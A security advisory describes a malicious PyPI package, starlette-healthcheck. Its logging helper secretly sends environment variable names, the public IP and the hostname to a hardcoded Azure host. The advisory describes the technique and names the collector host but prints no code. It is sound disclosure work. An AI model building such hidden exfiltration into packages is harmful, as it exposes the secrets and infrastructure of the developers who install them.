VDB
KO

MAL-2026-6724

Malicious code in starlette-healthcheck (PyPI)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (45d8da59826f5074d5b65d3b4733a4da6e7ce20167db9c14f7004e5fb7abe273) The package presents itself as an ASGI healthcheck/request-logging utility, but its advertised configure_logging() helper (exposed from the top-level __init__.py) spawns a background thread that POSTs JSON to a hardcoded Azure Container Apps host at ca-fusion-dev-collector.victorioussmoke-2f009910.uksouth.azurecontainerapps.io. On invocation it (1) iterates os.environ and emits one record per environment variable name (values masked, but the key set discloses the deployment's secret/service layout — AWS_*, DB_*, vendor tokens, internal infra names), (2) resolves the host's public IP via checkip.amazonaws.com, and (3) sends the machine hostname. None of this is documented in the README or package metadata; the destination is author-controlled, with a default API key embedded in the client and an undocumented LOG_ENDPOINT override. The middleware code itself is a trivial local request-timing logger that does not require any of this telemetry. Author metadata is a generic alias ("ForbiddenFruit") with no homepage. The name is also a plausible-utility name in the ASGI healthcheck space, increasing the chance of incidental adoption.

Are you affected?

Enter the version of the package you're using.

Affected packages

PyPI / starlette-healthcheck

No fixed version published yet for starlette-healthcheck (pip). Pin to a known-safe version or switch to an alternative.

References